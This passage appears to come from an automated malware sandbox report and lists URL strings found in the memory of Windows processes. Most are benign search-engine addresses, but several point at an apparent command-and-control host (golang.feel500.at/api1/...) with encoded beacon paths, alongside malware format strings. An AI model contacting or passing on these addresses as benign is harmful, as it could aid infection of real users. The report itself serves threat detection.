          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: loaddll32.exe, powershell.exe, 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, control.exe, 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, rundll32.exe, 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
          Source: loaddll32.exe, 00000000.00000003.358702565.00000000011A0000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, control.exe, 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, rundll32.exe, 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: powershell.exe, 00000018.00000003.388260705.0000027DF6B1B000.00000004.00000001.sdmp, explorer.exe, 00000022.00000000.377460662.000000000F6C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: {76F37E5B-4666-11EB-90E4-ECF4BB862DED}.dat.10.drString found in binary or memory: http://golang.feel500.at/api1/JqcXh8pdjCRNE_2Bo/k4G_2BpM24Ua/kAoQCjr_2Bh/ujHmQfZGFu_2F2/nA1tAcoG0Uwm
          Source: {76F37E5D-4666-11EB-90E4-ECF4BB862DED}.dat.10.dr, ~DFEC113D747FBB8244.TMP.10.drString found in binary or memory: http://golang.feel500.at/api1/MC0KUFyM/atN4YRJ4eGaVNgoEiHKk1sV/uZXY8dNFOC/5muSX5_2FgYBcb3Z0/Hw8SCE4g
          Source: explorer.exe, 00000022.00000002.576575569.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.578475888.000001FC11790000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.385331538.0000017764860000.00000002.00000001.sdmpString found in binary or memory: http://golang.feel500.at/api1/T71KVycXOQruF4f/s6NxfSxO4aOvwuDAhc/xYqC7FzXs/VyqbkY4JBrOhqczKNK_2
          Source: {76F37E5F-4666-11EB-90E4-ECF4BB862DED}.dat.10.dr, ~DFCE9772CEB2FA999E.TMP.10.drString found in binary or memory: http://golang.feel500.at/api1/T71KVycXOQruF4f/s6NxfSxO4aOvwuDAhc/xYqC7FzXs/VyqbkY4JBrOhqczKNK_2/FCqi
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: loaddll32.exe, 00000000.00000003.358702565.00000000011A0000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.377751018.0000000003120000.00000040.00000001.sdmp, powershell.exe, 00000018.00000003.355550125.0000027DF7010000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.374821992.0000000002EA0000.00000004.00000001.sdmp, control.exe, 00000023.00000003.365667494.00000264BEA60000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.581129276.000001FC1383E000.00000004.00000001.sdmp, rundll32.exe, 00000025.00000002.379471781.0000029741FAE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.579128816.000001776603E000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: powershell.exe, 00000018.00000002.408122537.0000027D90063000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: powershell.exe, 00000018.00000003.334029569.0000027DF6CC7000.00000004.00000001.sdmp, powershell.exe, 00000018.00000002.391542356.0000027D8020E000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: powershell.exe, 00000018.00000002.391291474.0000027D80001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000022.00000000.376007337.000000000E1C0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: RuntimeBroker.exe, 00000027.00000002.584711407.0000017766D3A000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000027.00000002.584681538.0000017766D2E000.00000004.00000001.sdmpString found in binary or memory: http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000022.00000000.376007337.000000000E1C0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 00000018.00000003.334029569.0000027DF6CC7000.00000004.00000001.sdmp, powershell.exe, 00000018.00000002.391542356.0000027D8020E000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000022.00000000.374089156.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000022.00000000.376459045.000000000E2B3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
